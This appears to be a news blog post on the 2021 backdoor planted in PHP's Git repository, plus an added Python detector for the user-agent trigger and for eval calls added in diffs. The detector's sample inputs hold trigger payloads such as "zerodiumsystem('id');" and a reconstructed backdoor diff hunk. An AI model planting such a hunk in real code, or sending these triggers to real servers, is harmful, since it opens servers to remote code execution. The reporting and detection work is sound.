PHP's Git server hacked to add backdoors to PHP source code

Blog post, Monday, March 29, 2021, in Security

In the latest software supply chain attack, the official PHP Git repository was hacked and the code base tampered with.


Yesterday, two malicious commits were pushed to the php-src Git repository maintained by the PHP team on their git.php.net server.

The attackers authored the commits under the names of two well-known PHP maintainers, Rasmus Lerdorf and Nikita Popov. Git's author and committer fields are free-form metadata that the server does not verify, so anyone with push access can attribute a commit to whomever they like; only a cryptographic commit signature or the authenticated identity of the account that pushed ties a change to a real person.
RCE backdoor planted on PHP Git server

In an attempt to compromise the PHP code base, two malicious commits were pushed to the official PHP Git repository yesterday.

The incident is alarming given PHP's reach: usage surveys put it behind roughly 79% of websites whose server-side language can be determined.

In the two malicious commits [1, 2] seen by BleepingComputer, the attackers pushed a change labelled "fix typo", presenting it as a minor typographical correction.

The added code, however, is anything but cosmetic. At added line 370 it calls the zend_eval_string function, which compiles and runs a string as PHP code inside the engine. The effect is a backdoor that gives trivial Remote Code Execution (RCE), with the privileges of the PHP process, on any web server running a build that contains this change.

"This line executes PHP code from within the useragent HTTP header, if the string starts with 'zerodium'," responded PHP developer Jake Birchall to Michael Voříšek, who had first pointed out the anomaly.
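The following is an added example, not code from the article or from the PHP project, showing the two checks a defender would want for an incident like this: a request-log scan for the trigger described above (a user-agent value starting with "zerodium", with the remainder treated as PHP code to evaluate) and a diff scan that flags any commit adding a call to an engine evaluator such as zend_eval_string. Which header names are inspected, the one-header-per-line log format, and the sample diff are all assumptions of this example; the sample inputs are constructed and are not real traffic or the real commit.

```python
import re

# Trigger prefix described in the article: header values starting with this
# string have the remainder handed to PHP's evaluator.
TRIGGER = "zerodium"

# The article only says "the useragent HTTP header". Which header names to
# inspect is an assumption of this example; the second spelling is included
# so a deliberately misspelled header, which ordinary log parsers ignore, is
# still caught.
SUSPECT_HEADERS = ("user-agent", "user-agentt")

# Engine entry points that compile and run a string as PHP code. A commit that
# adds a call to one of these outside the interpreter's own eval() support
# deserves a close look.
EVAL_SINKS = ("zend_eval_string", "zend_eval_stringl")


def extract_trigger_payload(headers):
    """Return the string the backdoor would evaluate, or None.

    Mirrors the trigger logic as the article describes it: if a user-agent
    value starts with the trigger prefix, everything after the prefix is PHP
    code that the backdoored build executes.
    """
    for name, value in headers.items():
        if name.lower() in SUSPECT_HEADERS and value.startswith(TRIGGER):
            return value[len(TRIGGER):]
    return None


def scan_request_log(lines):
    """Flag requests whose headers carry the trigger.

    Expects constructed lines of the form '<client-ip> <Header-Name>: <value>'
    (one header per line); adapt the regex to your own log format.
    Returns a list of (client_ip, payload) tuples.
    """
    hits = []
    pattern = re.compile(r"^(\S+)\s+([^:\s]+):\s*(.*)$")
    for line in lines:
        m = pattern.match(line.rstrip("\n"))
        if not m:
            continue
        ip, name, value = m.groups()
        payload = extract_trigger_payload({name: value})
        if payload is not None:
            hits.append((ip, payload))
    return hits


def added_eval_calls(diff_text):
    """Find '+' lines in a unified diff that introduce an eval sink.

    Returns (file_path, added_line) tuples, so a review check can object when
    a commit titled like a cosmetic fix introduces code execution.
    """
    findings = []
    path = None
    for line in diff_text.splitlines():
        if line.startswith("+++ "):
            path = line[4:].strip()
            if path.startswith("b/"):
                path = path[2:]
        elif line.startswith("+"):
            body = line[1:]
            if any(sink in body for sink in EVAL_SINKS):
                findings.append((path, body.strip()))
    return findings


# Constructed sample inputs (not real traffic and not the real commit).
SAMPLE_LOG = [
    "203.0.113.7 User-Agent: Mozilla/5.0 (X11; Linux x86_64)",
    "203.0.113.9 User-Agent: zerodiumsystem('id');",
    "198.51.100.4 User-Agentt: zerodiumphpinfo();",
    "198.51.100.5 Accept: zerodiumnot-a-trigger-header",
]

# Hypothetical file name and hunk shaped like the change the article
# describes: a "fix typo" commit that adds an eval call on header input.
SAMPLE_DIFF = """\
diff --git a/ext/example/example.c b/ext/example/example.c
--- a/ext/example/example.c
+++ b/ext/example/example.c
@@ -360,6 +360,9 @@ static int example_handler(zval *ua)
     }
+    if (strstr(Z_STRVAL_P(ua), "zerodium")) {
+        zend_eval_string(Z_STRVAL_P(ua) + 8, NULL, "backdoor");
+    }
     return SUCCESS;
"""

if __name__ == "__main__":
    for ip, payload in scan_request_log(SAMPLE_LOG):
        print(f"trigger from {ip}: would eval {payload!r}")
    for path, added in added_eval_calls(SAMPLE_DIFF):
        print(f"eval sink added in {path}: {added}")
```

The log scan only detects attempts against servers whose logs record the relevant header; the diff scan is the more durable control, since a commit that adds an evaluator call under a cosmetic commit message should fail review regardless of whose name is on it.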

bleepingcomputer.com